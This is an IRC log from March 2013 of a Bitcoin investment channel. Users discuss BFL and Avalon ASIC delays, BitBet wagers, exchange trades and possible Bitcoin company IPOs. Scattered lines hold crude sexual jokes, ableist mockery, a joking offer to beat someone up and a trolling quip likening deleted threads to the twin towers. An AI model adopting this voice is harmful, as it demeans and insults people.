were flipped Mar 01 06:14:20 um Mar 01 06:14:47 lul mircea, not a real girl Mar 01 06:16:05 huh ? Mar 01 06:17:03 is she real or is it just you? Mar 01 06:17:23 you can tell me :) Mar 01 06:18:11 she's real. Mar 01 06:18:21 how come she doesnt hang in here Mar 01 06:18:48 well, she wouldn't hang on the forum either if it weren't her job Mar 01 06:18:56 yeah she should be on irc, marketing/pr Mar 01 06:19:11 keeping BitHub company Mar 01 06:19:51 why are you cockblocking the rest of us mircea? :( Mar 01 06:20:45 Because that would be extra work for PR, so more salary to pay? Mar 01 06:20:57 and mircea is already handling IRC Mar 01 06:21:19 extra? i thought it was included ontop of social media? Mar 01 06:21:36 ya there's little benefit of redundancy. Mar 01 06:21:51 mp, any new IPOs this spring? Mar 01 06:22:05 if any companies worth listing get their shit together... Mar 01 06:22:18 lul Mar 01 06:22:39 when are you going to do a deal with wallstreet like coinlab? Mar 01 06:22:48 so far we're still at the "but we don't need more btc" / "we are making our own exchange" phase it seems. Mar 01 06:22:56 BitHub in 2012. Mar 01 06:23:35 mp, who do you think are the best non-"public" bitcoin companies that would feasible IPO someday Mar 01 06:24:28 not necessarily on mpex Mar 01 06:24:35 wherever Mar 01 06:29:14 hard to tell. Mar 01 06:29:33 pretty much everything is needed. Mar 01 06:29:46 we need a bitcoin ebay. that bitmit thing ain't it. once it exists it could ipo Mar 01 06:30:16 something like bitmessage.org could ipo if it actually finished the product and monetized it Mar 01 06:30:33 in between these there's a huge space. pretty much anything could if it made sense. Mar 01 06:30:43 currently there's not that many people focused on making sense tho. Mar 01 06:31:13 whats bitmit's problem Mar 01 06:31:24 other than that it feels scammy to surf Mar 01 06:31:36 complete lack of relevance basically. Mar 01 06:31:55 what's the value proposition, why am i using it instead of ebay ? Mar 01 06:32:02 "because bitcoin" ? that dun wash, it's not 2011. Mar 01 06:32:46 while i dont disagree i cant think of what could make a bitbay more relevant Mar 01 06:33:02 there's this failed "web entrepreneur" mindset at work, "we make the site, the users fill it with stuff". that's nonsense. Mar 01 06:33:19 simple : large supply of actually in demand goods cheaper than in fiat. Mar 01 06:33:38 like a retailer Mar 01 06:33:45 show me a bottle of coke costing 99 cents on ebay and 96 cents on bitmit. Mar 01 06:33:47 bithub.asia will ipo Mar 01 06:36:10 sry all i could find was a $32 weed stash https://www.bitmit.net/en/item/16772-soda-can-safe Mar 01 06:36:17 no coke Mar 01 06:37:28 > ideal for hiding your valuables in plain sight. Mar 01 06:37:40 hey dude why is your beer not in the fridge? Mar 01 06:37:54 lol Mar 01 06:38:16 put it in the fridge then Mar 01 06:38:24 "hey man why is there weed in your beer" Mar 01 06:38:32 hey dude why there is no beer in this beer Mar 01 06:38:49 still a lot of room for online gambling Mar 01 06:38:51 problems all around. Mar 01 06:38:59 sealswithclubs is a trainwreck website Mar 01 06:39:20 it is. Mar 01 06:39:35 bitbet poker then? Mar 01 06:39:38 something better will come along Mar 01 06:40:02 I'm not sure I haven't seen any online poker that doesn't look like a shit show. Mar 01 06:40:32 bitpoke.com Mar 01 06:41:30 you think a bitstaprint.com would take? Mar 01 06:42:11 i assume vistaprint.com is wellknown in the world Mar 01 06:42:25 forgive me if that was a random reference Mar 01 06:43:08 A Bitstaprint might take, but the margins might suck. Mar 01 06:43:37 vistaprint really did fuck everyone in that sense Mar 01 06:43:45 no margin left Mar 01 06:44:06 although i still broker printing thru my biz for way more than vistraprint charges Mar 01 06:44:16 small biz will pay for better printing Mar 01 06:44:55 ive debated doing a bitcoin printer site Mar 01 06:45:04 The Vistaprint model seems to be: Mar 01 06:45:07 ThickAsThieves what's wrong with seals ? Mar 01 06:45:13 1. Collect a lot of capital Mar 01 06:45:27 2. Die way too slowly undercutting the competition Mar 01 06:45:28 its totally unappealling to even consider reading their offerings Mar 01 06:45:32 lame ops, lame client, lame lamers Mar 01 06:45:37 hm Mar 01 06:45:42 so someone should make a poker site then Mar 01 06:45:53 seals looks like a scam Mar 01 06:46:11 if they just spent a few grand on some hot design Mar 01 06:46:14 tahts go a long way Mar 01 06:46:21 thatd* Mar 01 06:46:26 this "design solves problems" approach is naive. Mar 01 06:46:31 not solves Mar 01 06:46:34 facilitates Mar 01 06:46:44 design is not cocksucking. Mar 01 06:46:52 it's makeup though Mar 01 06:47:25 Seals big problem now seems to be Micon can't take a little bit of retliatory trolling from BFL and his gamlbing instincts are betraying his lack of marketing instincts Mar 01 06:47:51 yeah he isnt doing his biz any favors Mar 01 06:47:56 with those youtube vids and shit Mar 01 06:48:12 or maybe he is Mar 01 06:48:23 no such thing as bad publicity some say Mar 01 06:48:51 mp, i dont think great design is required for utility, but it is a part of salesmanship and interactivity Mar 01 06:49:13 (aside from uix design, which is a diff converation) Mar 01 06:49:21 I've bet against BFL, but BFL can probably stay at the edge of shipping another 9 months and still keep some trust. The problem is that Josh is just a better troll than Micon. Mar 01 06:49:42 and people want what josh is selling Mar 01 06:50:25 compare avalon and BFL designwise Mar 01 06:50:43 which one can get away with more Mar 01 06:50:55 and appears more trustable Mar 01 06:51:00 Micon's problem is he revealed his scammer intuition on BFL, but he played the Queen's gambit and is falling apart now that Black took his bishop's pawn. Mar 01 06:51:10 even the product design of BFL is considered Mar 01 06:51:24 BFL and Avalon both look insufficiently competent to do what they do. Mar 01 06:51:47 Avalon's shipped maybe 5, 7 products in a month Mar 01 06:52:08 BFL "killed" a wafer to test their layout. Mar 01 06:52:14 indeed Mar 01 06:52:29 BFL also sent chips to get bumped without a goddam map. Mar 01 06:52:39 they did it cause of the lateness of everything else Mar 01 06:52:58 provided they did get chips into "bumping" Mar 01 06:52:59 the lateness was their own fault though Mar 01 06:53:14 they didnt have to ever be late Mar 01 06:53:19 i think that was a good idea, to 'kill' that wafer for testing given lateeness, cause that testing through which the killed wafer is going is the next step of the pipeline Mar 01 06:53:24 if they planned and managed the project properly Mar 01 06:53:30 and we at this poing should expect delays at every point Mar 01 06:53:41 it was a good idea PRwise Mar 01 06:53:45 so the testing's lateness is going in parallel Mar 01 06:53:58 If it was a 200mm wafer they easily killed $45,000 though Mar 01 06:54:26 45000 in sales, but $$$$$$$$$$$$$$$$$$$ in long-term revenue, but -$$$$ in gain for those waiting Mar 01 06:55:04 Not in sales, in pure expense. Like BFL said that is roughly a thousand chips once it is broken up. Mar 01 06:55:53 yeah still, a drop in the bucket in the grand scheme Mar 01 06:56:00 splnkr dont overestimate how quickly these devices will be delivered because they killed that wafer Mar 01 06:56:02 The lost retail product that wafer might have delivered would probably be mid six figures if the box and fans are free Mar 01 06:56:16 let's say for argument they have 10000 orders. Mar 01 06:56:25 their first shipments will be small Mar 01 06:56:30 average out to like 50ghs a sec Mar 01 06:56:34 also Mar 01 06:56:45 dont pretend they wont prioritize minirig buyers Mar 01 06:56:48 Raw order numbers mean nothing when you segment the market like BFL did Mar 01 06:56:56 cuz they will Mar 01 06:57:27 well that's why i'm saying average, from minirig to jalapeno Mar 01 06:57:28 minirig buyers can afford to fly out there and tear them a new asshole Mar 01 06:58:09 they will probably hide that though Mar 01 06:58:14 by shipping slowly Mar 01 06:58:30 or lying about what portion of chips got used for what Mar 01 06:58:39 so we're talking 500THz capacity, i doubt one wafer loss is really that big a deal Mar 01 07:01:36 yknow i could actually compete with vistaprint on some things Mar 01 07:01:42 One might not be bad, but it is one out of six, with some of those six apparently unfinished. It could be very bad if the tests fail. Mar 01 07:01:49 they arent as cheap as they used to be it seems Mar 01 07:01:55 Better cardstock? Mar 01 07:02:08 yeah Mar 01 07:02:54 [MPEX] [S.MPOE] 7420 @ 0.00075999 = 5.6391 BTC [+] Mar 01 07:02:55 [MPEX] [S.MPOE] 5151 @ 0.00076 = 3.9148 BTC [+] Mar 01 07:03:05 [HAVELOCK] [HIM] 4 @ 1.725 = 6.9 BTC [-] Mar 01 07:03:41 damn they arent that cheap at all anymore Mar 01 07:03:53 $140 for 1000postcards Mar 01 07:04:05 [HAVELOCK] [SDICE] 3 @ 0.679 = 2.037 BTC [-] Mar 01 07:04:06 [HAVELOCK] [SDICE] 7 @ 0.68 = 4.76 BTC [+] Mar 01 07:05:03 Fuck postcards. How many business cards do you think you could deliver for $100 printing on veal parchment? Mar 01 07:05:21 0 Mar 01 07:06:51 but my wholesale cost on 1000 UV gloss color business cards is like $17 Mar 01 07:07:06 printed both sides Mar 01 07:07:36 which i retail for like $80 Mar 01 07:08:05 [HAVELOCK] [SDICE] 1 @ 0.68 BTC [+] Mar 01 07:08:06 woohoo my HIM split script worked Mar 01 07:08:14 hehe grats Mar 01 07:08:35 now down to ~$60/share instead of $600 :p Mar 01 07:09:24 but when will you release your asicssssss Mar 01 07:09:34 haha talk to BFL :p Mar 01 07:11:06 you know i wasnt bothered about the delays at all , since it just meant better return from the FPGA's... as long as everyone was delayed... but no w that some asics are out.. its gonna get annoying reaaaaaal quick Mar 01 07:11:43 ;;bc,diff Mar 01 07:11:44 3651011.6306932 Mar 01 07:11:48 ;;bc,stats Mar 01 07:11:51 Current Blocks: 223698 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 77 blocks | Next Difficulty In About: 10 hours, 59 minutes, and 59 seconds | Next Difficulty Estimate: 4400426.03912 | Estimated Percent Change: 20.52621 Mar 01 07:12:08 annoying in about 11 hours Mar 01 07:14:20 ahhh Mar 01 07:14:29 lol yea Mar 01 07:14:41 shrimp + pasta in garlic white sauce (whole flour!) Mar 01 07:14:48 breakfast of champions Mar 01 07:15:53 Who has solid food for breakfast. Vodka + Simple Syrup FTW. Mar 01 07:16:36 thats for yesterday. Mar 01 07:18:51 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Mar 01 07:18:55 ez money? Mar 01 07:18:56 Was Yesterday a special occasion that deserved better? Mar 01 07:20:49 Mar 01 00:47:18 lalala Mar 01 07:20:49 Mar 01 00:47:56 very suspicious good mood there Mar 01 07:20:49 Mar 01 00:48:07 i concur Mar 01 07:20:49 Mar 01 00:48:40 my 1.76 liter bottle of vodka is still mostly full. Mar 01 07:20:49 Mar 01 00:52:06 mix it with red grapefruit juice Mar 01 07:20:49 Mar 01 00:54:03 im mixing it with fresh orange juice actually. Mar 01 07:20:57 nothing much Mar 01 07:21:25 [MPEX] [S.DICE] 1000 @ 0.00637776 = 6.3778 BTC [-] **** BEGIN LOGGING AT Fri Mar 1 07:21:27 2013 Mar 01 07:21:27 [MPEX] [S.DICE] 4000 @ 0.00637777 = 25.5111 BTC [+] Mar 01 07:22:05 [HAVELOCK] [SDICE] 3 @ 0.651 = 1.953 BTC [-] Mar 01 07:22:07 [HAVELOCK] [SDICE] 14 @ 0.6505 = 9.107 BTC [-] Mar 01 07:22:08 [HAVELOCK] [SDICE] 30 @ 0.65 = 19.5 BTC [-] Mar 01 07:22:09 [HAVELOCK] [SDICE] 3 @ 0.649 = 1.947 BTC [-] Mar 01 07:22:27 I mean we passed the Mt Gox high, but apparently some exchange Blockchain.info follows had the high price at $35, so I've saving the cigars Mar 01 07:26:46 fuck the rain Mar 01 07:27:05 [HAVELOCK] [SDICE] 3 @ 0.679 = 2.037 BTC [+] Mar 01 07:28:25 So, BFL is is Kansas City. Is Josh/Inaba Rock chalk like a Jayhawk or like General Quantrill does e see all of the common sense reasons why Lawrence should burn? Mar 01 07:29:58 [MPEX] [S.MPOE] 5655 @ 0.00076 = 4.2978 BTC [+] Mar 01 07:33:05 [HAVELOCK] [KCIM] 2 @ 0.9988 = 1.9976 BTC [+] Mar 01 07:34:04 [HAVELOCK] [KCIM] 6 @ 1 = 6 BTC [+] Mar 01 07:34:32 http://i.imgur.com/LPmQ46C.jpg Mar 01 07:34:39 bitcoin entrepreneur (he thinks) Mar 01 07:35:27 who's that? Mar 01 07:35:37 mircea wtf Mar 01 07:35:50 stop sharing my fb profile pic Mar 01 07:35:50 What happpened to his forhead? Mar 01 07:36:08 brain has to grow somewhere Mar 01 07:36:11 https://bitcointalk.org/index.php?topic=147613.msg1568249#msg1568249 Mar 01 07:36:14 [MPEX] [S.DICE] 5000 @ 0.00637777 = 31.8889 BTC [+] Mar 01 07:36:19 hes' the "bitmillions new" guy Mar 01 07:36:19 Oh, it's BitHub Mar 01 07:37:04 [HAVELOCK] [SDICE] 1 @ 0.650005 BTC [-] Mar 01 07:37:06 [HAVELOCK] [SDICE] 7 @ 0.650005 = 4.55 BTC [-] Mar 01 07:37:07 [HAVELOCK] [SDICE] 22 @ 0.65000001 = 14.3 BTC [-] Mar 01 07:37:08 [HAVELOCK] [SDICE] 7 @ 0.65 = 4.55 BTC [-] Mar 01 07:37:09 [HAVELOCK] [SDICE] 12 @ 0.649 = 7.788 BTC [-] Mar 01 07:37:45 so this guy is an aussie scammer? Mar 01 07:37:54 more like aussie idiot Mar 01 07:38:15 want me to bash him? Mar 01 07:38:18 i have a crew Mar 01 07:38:32 no cause you might accidentally fix his hairline Mar 01 07:38:33 lol Mar 01 07:38:41 its no problem Mar 01 07:38:55 he's bashed enough as it is Mar 01 07:39:00 okey Mar 01 07:39:32 since bitcoin i've become real good at counting zeros Mar 01 07:39:48 i'm joking anyway i dont really do that Mar 01 07:40:56 MP, this trolling something awful deal is taking a while. In the interim could you maybe hold a contest for spotting extra chromosones on bitcointalk? Mar 01 07:41:16 lol Mar 01 07:41:20 lol what Mar 01 07:41:32 actually the trolling sa thing delivered in spades Mar 01 07:41:37 tho i was doing most of the trolling Mar 01 07:42:49 I've recieved one of your gift certificates. I've got time now though where I am looking at the long troll. Get to the moderator control pnel and make threads disapear like thie twin towers. Mar 01 07:43:47 so how many people got the ten btc trolling price Mar 01 07:43:53 prize Mar 01 07:45:04 [HAVELOCK] [SDICE] 1 @ 0.64 BTC [-] Mar 01 07:47:19 i give just enough a damn about the IRC community to actually hang out; can't understand how some see it as the target for misanthropic gratification Mar 01 07:47:27 ther are SOOOOOOO many better targets Mar 01 07:48:14 What's a better target than SA? Mar 01 07:48:39 um, media?govt? fortune 500? stodgy educators? Mar 01 07:48:45 the list is practially endless Mar 01 07:49:12 scuse my spelling at this late hour Mar 01 07:50:09 Media's too easy. I've done local and regional papers a few too many times. Government trolls itself. I'm a stodgy educator... What targets are left nao? Mar 01 07:50:34 check yoself fool Mar 01 07:50:37 =) Mar 01 07:52:15 Ok, checked... Mar 01 07:53:04 I'm ready to fuck, been ready to fuck, these pants are so tight Mar 01 07:56:03 [BTCTC] [GSDPT] 219 @ 0.0065 = 1.4235 BTC [+] Mar 01 07:56:14 HAHA WAT Mar 01 07:56:50 sheesh, sorry i asked Mar 01 07:57:06 So... What's the deal with that Blockchain.info mixer? Mar 01 07:57:45 It mixes Mar 01 07:58:24 I mean the part where it has been phasing in and out of existence these past couple days. Mar 01 07:58:47 oh. No idea. Mar 01 07:58:49 Is that some bullshit, or is that some bull shit? Mar 01 07:59:00 both? Mar 01 08:04:56 I'm kind of wondering, where's the BitBets on the first S.BBET passthrough? Mar 01 08:07:48 Which passthrough was the first one? Mar 01 08:08:57 [BTCTC] [LTC-MINING] 1 @ 0.38 BTC [-] Mar 01 08:08:59 [BTCTC] [LTC-MINING] 1 @ 0.38 BTC [-] Mar 01 08:10:20 I don't know that there is an S.BBET passthrough yet. Mar 01 08:11:10 You'd think as much as Kumala wants to monetize Virecurex and Crypto::Stocks he would race to set one up. Mar 01 08:11:32 There's one I manage and another on BitFunder Mar 01 08:11:55 Namworld, where's yours at? Mar 01 08:12:03 BTCT.co Mar 01 08:12:17 I find BitBet overpriced right now tho. Mar 01 08:12:38 coinbr.com has bbet for sale Mar 01 08:12:49 makes 3 Mar 01 08:13:09 I don't know. I find it a bit underpriced for all the bets I've bought in on that won't realize till the end of the year... Mar 01 08:14:14 definitely a buy and hold if anything Mar 01 08:14:43 If you are calling it overpriced Namworld I might finally have to get my shit together and finally register for that MPEX dealio Mar 01 08:15:32 I'm calling the shares as a whole overpriced. Mar 01 08:15:48 0.002 right now Mar 01 08:16:23 200'000 satoshi a pop. 20 000 BTC valuation. Mar 01 08:16:31 I now, that's thy I think they are qorth quite a bit more. Especially since the initial valuation for the whole enterprise was only 100 BTC. Mar 01 08:17:19 They take 1% in fees. Would take 2 million BTC in bets to make a 100% dividend. Mar 01 08:18:04 0.002 is 200x initial valuation Mar 01 08:18:07 has anyone figured out the dividend for bbet this month? I might take a crack at it but just as likely might wait to see the number Mar 01 08:18:13 Details, details. There's also the house bets and idiots who bet against any sense. Mar 01 08:18:25 I think it was over-buyed at IPO, people panic buying. Mar 01 08:18:35 The BFL bet is going to throw everything for fruit loops Mar 01 08:18:42 now no one buys, no one sells. Almost. Mar 01 08:19:16 the bets are boring Mar 01 08:20:14 Right now too many are. There is very little action on most bets. Mar 01 08:20:37 well so make some good ones Mar 01 08:20:47 I'm boring Mar 01 08:22:28 how about a major us bank will deploy ripple by 2013 Mar 01 08:22:37 fuck, that's boring too Mar 01 08:22:40 ill take the no on that. Mar 01 08:23:31 I wanted no, but you're on if I can't think of something better in 30 minutes Mar 01 08:23:45 1 btc, nobody gets hurt Mar 01 08:24:25 I have tried. A critical user mass is missing Mar 01 08:24:35 tried what Mar 01 08:24:37 ? Mar 01 08:24:47 i dunno about that, Mar 01 08:25:09 the april bfl bet is alreayd over 20 btc Mar 01 08:25:17 that's a healthy sum of change if you think about it. Mar 01 08:25:33 scratch that, it's over 40 btc 0.0 Mar 01 08:25:48 how about one for avalon too to make it interesting Mar 01 08:25:51 because none writing bets reads people magazine. I'm not going to volunteer, but I think that's what is needed here. Mar 01 08:26:25 people magazine ?! Mar 01 08:26:41 that's what I said. Mar 01 08:27:02 i dun get it tho Mar 01 08:27:29 celebrities and kittens get eyeballls. Mar 01 08:27:53 there were a buncha oscars i recall Mar 01 08:28:16 true Mar 01 08:29:01 I'm heading over to people.com now. then I'll hit up oprah's site Mar 01 08:29:24 eww Mar 01 08:29:26 Pari seems to still lack enough market makers Mar 01 08:30:32 Is Tom trying to get custody of his daughter? maybe that's something. I can't believe I'm thinking of investigating this. Mar 01 08:30:58 Oh shit Mar 01 08:34:11 anyone want to take a side on "Tom gets custody of Suri by the End of April? " Mar 01 08:34:19 [MPEX] [O.BTCUSD.C330T] 120 @ 0.25512908 = 30.6155 BTC [+] Mar 01 08:34:20 I made a bet for avalon on bitbet. lets get this shit rollin Mar 01 08:34:28 who's suri Mar 01 08:35:03 his daughter Mar 01 08:35:17 By the way I'm talking about Tom Cruise. Suri is his daughter. Tom Cruise just divorced his Wife Katie Holmes Mar 01 08:36:12 I sending up a 1 btc bet, just giving you insiders a chance to pick a side and I'll take the other. Mar 01 08:36:43 I think that would be best for Suri and the other children. Mar 01 08:36:43 I just know bit365.eu won't be around long if they keep paying so much for betting against the Astros and Marlins... Mar 01 08:37:16 Suri stays with Katie, family law isn't that fucked yet Mar 01 08:37:42 I guess that means I'm taking yes. Mar 01 08:38:57 I might throw a bitdime on no if it posts Mar 01 08:40:31 .1 btc? Mar 01 08:41:53 I imagine it would get too lopsided too fast for real money Mar 01 08:42:05 [HAVELOCK] [HIM] 5 @ 1.725 = 8.625 BTC [-] Mar 01 08:42:13 I'm asking what is a btcdime Mar 01 08:42:25 0.1 BTC Mar 01 08:42:48 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Mar 01 08:42:51 there it is Mar 01 08:43:27 you added more stipulatons? Mar 01 08:43:27 :3 Mar 01 08:43:58 tried to make it into something Mar 01 08:44:14 thats the one i submitted, right? Mar 01 08:44:17 ya Mar 01 08:44:30 prototypes lol wtf Mar 01 08:44:39 inclined to vote no as a hedge Mar 01 08:44:51 well the jgarzik stuff Mar 01 08:45:03 BingoBongo how's lopsided ? Mar 01 08:46:35 I voted no on avalon Mar 01 08:46:58 I used .5 btc from Tom's basic refund. Mar 01 08:47:34 Cruise tends to lose in court Mar 01 08:50:22 I put it up there, but didn't take a side by mistake. I'll take yes as soon as it's approved. That is unless your comment about court is some way to convince me to take no. Mar 01 08:51:00 [BTCTC] [S.MPOE-PT] 2 @ 0.00072 = 0.0014 BTC [-] Mar 01 08:51:49 [MPEX] [S.DICE] 300 @ 0.00620001 = 1.86 BTC [-] Mar 01 08:51:50 [MPEX] [S.DICE] 240 @ 0.00620001 = 1.488 BTC [-] Mar 01 08:51:52 [MPEX] [S.DICE] 1811 @ 0.0062 = 11.2282 BTC [-] Mar 01 08:51:54 [MPEX] [S.DICE] 4687 @ 0.00610821 = 28.6292 BTC [-] Mar 01 08:52:46 why sell s.dice right before the dividend? Mar 01 08:53:06 [HAVELOCK] [HIM] 1 @ 1.725 BTC [-] Mar 01 08:53:21 heh, 10.56 on no Mar 01 08:53:52 avalon ppl get no credit around here huh Mar 01 08:53:53 all from you? Mar 01 08:53:58 mnope Mar 01 08:54:38 i wanna put no, but theres no yes Mar 01 08:54:39 lol Mar 01 08:54:42 mhm Mar 01 08:54:43 anyway, im off. gl all Mar 01 08:54:48 night Mar 01 08:54:56 night **** BEGIN LOGGING AT Fri Mar 1 14:52:10 2013 Mar 01 14:54:36 just submitted a couple bet ideas Mar 01 14:54:41 was wondering Mar 01 14:55:04 would it be unacceptable to say "The next winner of Project Runway will be homosexual"? Mar 01 14:55:08 :) Mar 01 14:55:53 well, it may be difficult to check Mar 01 14:56:21 nah Mar 01 14:56:34 so much infiltrating of these peoples lives online probly Mar 01 14:57:16 i suppose being flamboyant isnt proof... Mar 01 14:57:20 nope. Mar 01 14:57:25 if they say so it's one thing Mar 01 14:57:34 if they don't tho... Mar 01 15:00:45 pics or gtfo Mar 01 15:01:36 pix of what ? their dilated bunghole ? Mar 01 15:01:54 goatse style Mar 01 15:03:35 lol Mar 01 15:07:11 [BTCTC] [GSDPT] 18 @ 0.00641 = 0.1154 BTC [-] Mar 01 15:07:18 6-8 watts/G this is okay for asic? Mar 01 15:07:39 hey mp Mar 01 15:07:40 from here, friedcat updated https://bitcointalk.org/index.php?topic=99497.msg1571278#msg1571278 Mar 01 15:07:44 your bet Mar 01 15:07:46 umm Mar 01 15:07:59 hm ? Mar 01 15:08:05 what do you mean by majority ships Mar 01 15:08:18 because avalon 2's shipping is april 10th Mar 01 15:08:35 jesus fuck these things are impossible aren't they. Mar 01 15:08:44 majority of batch 1, not majority of all items they will ever produce Mar 01 15:08:53 (and it is your bet!!1) Mar 01 15:08:54 oh Mar 01 15:08:55 okay then Mar 01 15:08:58 Yeah Mar 01 15:09:02 I will bet on Yes :P Mar 01 15:09:12 that'll be a first. Mar 01 15:11:05 i wanna complain that he doesnt really give any dates or schedules, but then again, who ever really lives up to those... Mar 01 15:11:26 well ya but still, things irl happen on some sort of timescale Mar 01 15:11:31 http://i.imgur.com/KzY4tPF.jpg Mar 01 15:11:35 update essentially says "we're working on it, we;ll get better!" Mar 01 15:11:52 "Starting from next Monday, units will be en route to their country of destination and tracking numbers will follow maybe 2~3 days after (it is at this point onward which you can expect an email from us with the tracking information), we expect this process to continue to the 10th of March until all the units have been shipped out, if all is well people will get their units in-hand in the middle of March." Mar 01 15:12:40 i was refering to asicminer Mar 01 15:13:11 nice pic, but we've seen so many boxes of fans Mar 01 15:14:09 this one prints money Mar 01 15:16:04 [HAVELOCK] [SDICE] 1 @ 0.685 BTC [-] Mar 01 15:17:14 Bowjob based on that text the bet is pretty relevant Mar 01 15:17:47 i guess Mar 01 15:17:57 its a matter of shipping.. Mar 01 15:18:19 which monday however Mar 01 15:18:24 i havent set the bet yet :P Mar 01 15:20:09 yifu said christmas came early to them Mar 01 15:20:20 from winning the huge bfl bet Mar 01 15:20:32 i guess they bet either 300+ or the 250 bet Mar 01 15:20:39 prolly the 300+ Mar 01 15:21:34 coolness. Mar 01 15:21:43 wait, wasn't newyears just last week ? Mar 01 15:22:22 umm month, but he's referring to this years xmas Mar 01 15:23:06 :p Mar 01 15:23:30 &ticker Mar 01 15:23:30 BTCUSD ticker | Best bid: 34.08001, Best ask: 34.17002, Bid-ask spread: 0.09001, Last trade: 34.08001, 24 hour volume: 71974.65510805, 24 hour low: 30.90200, 24 hour high: 34.51541, 24 hour vwap: 33.23048 Mar 01 15:24:29 if this rally continues, I'll be able to afford a nice house at the end of the year Mar 01 15:24:44 then after that perhaps go back to school.. Mar 01 15:24:58 lol cool Mar 01 15:25:00 my priorities are backwards.. usually people go to school first Mar 01 15:25:04 .. Mar 01 15:25:05 lol Mar 01 15:28:23 mircea has the BFL March 1st bet paid out? Mar 01 15:29:24 tecnical difficulites Mar 01 15:29:37 technical*/ Mar 01 15:29:44 fuckin fucked fuck keyboad. Mar 01 15:29:50 rd Mar 01 15:29:51 Zillion: I haven't seen my bet in my wallet yet Mar 01 15:29:59 spacex is going to launch the dragon again at 10:10AM EST http://www.space.com/17933-nasa-television-webcasts-live-space-tv.html Mar 01 15:30:02 not sure how long it takes. Mar 01 15:30:23 if we are talking about the the bitbet.us one. Mar 01 15:30:30 Zillion not yet. will be paid out presently. Mar 01 15:30:56 mircea_popescu: thanks! Mar 01 15:31:12 blu3gr1ffon ok thanks just curious...usually they are fast but this one is big Mar 01 15:31:13 np np Mar 01 15:31:55 cool mircea Mar 01 15:34:18 anyone getting in on the BTC/USD at Mt.Gox will hit $35 in March 2013 bet? Mar 01 15:34:55 im sure some people are Mar 01 15:36:05 i wonder why not more. Mar 01 15:36:10 so close already Mar 01 15:37:30 ya srslty. Mar 01 15:39:12 Spacexxxxx Mar 01 15:39:25 Big day Mar 01 15:41:05 [HAVELOCK] [KCIM] 5 @ 1 = 5 BTC [+] Mar 01 15:43:50 "Congresswoman Maxine Waters (D-CA) claimed today that "over 170 million jobs" could be lost due to sequestration. " Mar 01 15:43:54 why are these people even in congress ? Mar 01 15:44:01 they're basically as dumb as reddit. Mar 01 15:44:29 coinlab's Buy $1M buttons are back Mar 01 15:46:52 im sure that makes all the difference :D Mar 01 15:47:24 maxine waters might say extreme stuff sometimes but she's no fool Mar 01 15:47:31 she's among the best Congress has to offer Mar 01 15:48:16 she was the one to bring allegations of CIA crack cocaine trafficking to light in DC Mar 01 15:48:23 that's a pretty big deal in my book Mar 01 15:48:49 splnkr that's my point Mar 01 15:48:58 she's among the best congress has to offer and that's what she says Mar 01 15:48:59 yawn Mar 01 15:49:00 does not compute Mar 01 15:49:15 pigeons spam detracted Mar 01 15:49:15 in politics, sometimes you hyperbolize to make a point Mar 01 15:49:20 that's what you do when you're not lying Mar 01 15:49:22 spam retracted Mar 01 15:49:39 splnkr ya well, here's the deal : if there actually existed 170mn jobs in the us it wouldn't be in the crapper would it Mar 01 15:49:49 sometimes you take an extreme position to reach a better compromise Mar 01 15:49:54 it's called negotiation Mar 01 15:50:18 but i do see your point in this particular case Mar 01 15:50:25 she maybe meant to say 176K Mar 01 15:50:56 [BTCTC] [GSDPT] 2000 @ 0.00641 = 12.82 BTC [-] Mar 01 15:50:57 yeah. Mar 01 15:51:08 however I think a lot of us often react to what people say when they're taking extreme positions for negotiation purposes Mar 01 15:51:31 for example an apt. complex i was advising decided to build their own cogen plant because the electricity service was threatening much higher rates Mar 01 15:51:45 well, now the electricity service backpedaled and is offering a continuation at the same rate Mar 01 15:51:58 but the apt managers were too dumb to realize they were just bandstanding Mar 01 15:52:30 now i wonder how this affects BTC speculation =P Mar 01 15:52:36 lieing and misleading sucks. even though lying and misleading is expected of politicians, it still sucks, and because of their position, perhaps sucks more Mar 01 15:52:58 well, maybe, or maybe it's that people suck, and force politicians to lie. Mar 01 15:53:08 people suck so im forced to kill and steal Mar 01 15:53:21 dont blame the poor politicians Mar 01 15:53:24 whoa whoa the killing and stealing are another issue altogether Mar 01 15:53:32 [BTCTC] [LTC-MINING] 9 @ 0.38 = 3.42 BTC [-] Mar 01 15:53:34 [BTCTC] [LTC-MINING] 5 @ 0.39 = 1.95 BTC [+] Mar 01 15:53:36 [BTCTC] [LTC-MINING] 5 @ 0.395 = 1.975 BTC [+] Mar 01 15:54:25 look, if you view a type of person as completely inhuman and one-dimensional so you can scapegoat them, you're never going to really understand why they are the way they are Mar 01 15:54:41 i had the experience of running for an elected office once and it totally changed my perspective Mar 01 15:55:10 lieing and misleading sucks. even though lying and misleading is expected of politicians, it still sucks, and because of their position, perhaps sucks more <<< this. nonspam detected. Mar 01 15:55:36 just make your motherfucking point, that's what a congress is for. Mar 01 15:55:41 it's not a set of survivor or w/e Mar 01 15:55:52 so for example, sometimes what looks like stupidity from the outside is really willful ignorance Mar 01 15:55:58 but it's always easier to self aggrandize and hyperbolize than make points Mar 01 15:56:04 that's why the internet is so fulla hyperbolae Mar 01 15:56:52 well the irony here is that story about maxine waters misquoting a number probably got more exposure than the story about her exposing the CIA-crack connection in the 90's Mar 01 15:57:35 im suprised you lost, you are a politician, now its "misquoting" Mar 01 15:58:09 i guess this teaches the importance of not fudging numbers. Mar 01 15:58:21 i certainly dislike people that do that more than people that do coke. Mar 01 15:59:09 [BTCTC] [GSDPT] 700 @ 0.00641 = 4.487 BTC [-] Mar 01 16:00:05 [HAVELOCK] [HIM] 2 @ 1.73 = 3.46 BTC [+] Mar 01 16:01:05 [HAVELOCK] [SDICE] 2 @ 0.685 = 1.37 BTC [-] Mar 01 16:01:54 pigeons: i'm not trying to defend politicians, but explain them Mar 01 16:02:03 i have less than zero time for their BS Mar 01 16:02:25 they are leading the way to 100 years ago Mar 01 16:02:41 it's a joke and i don't care to stick around for the punchline Mar 01 16:03:14 to be constantly wrapped up in their misdeeds is paralyzing Mar 01 16:03:23 i'd rather just ignore and proceed =) Mar 01 16:04:46 nice that you found btc then Mar 01 16:05:31 yeah i guess if you're going to jump down a rabbit hole it might as well be the one with the most potential to lead somewhere better Mar 01 16:12:09 [BTCTC] [ESECURITYSABTC] 1 @ 0.63899 BTC [-] Mar 01 16:12:59 [BTCTC] [BTC-BOND] 20 @ 0.01 = 0.2 BTC [+] Mar 01 16:19:20 mircea_popescu ; I summon thee from da depths. 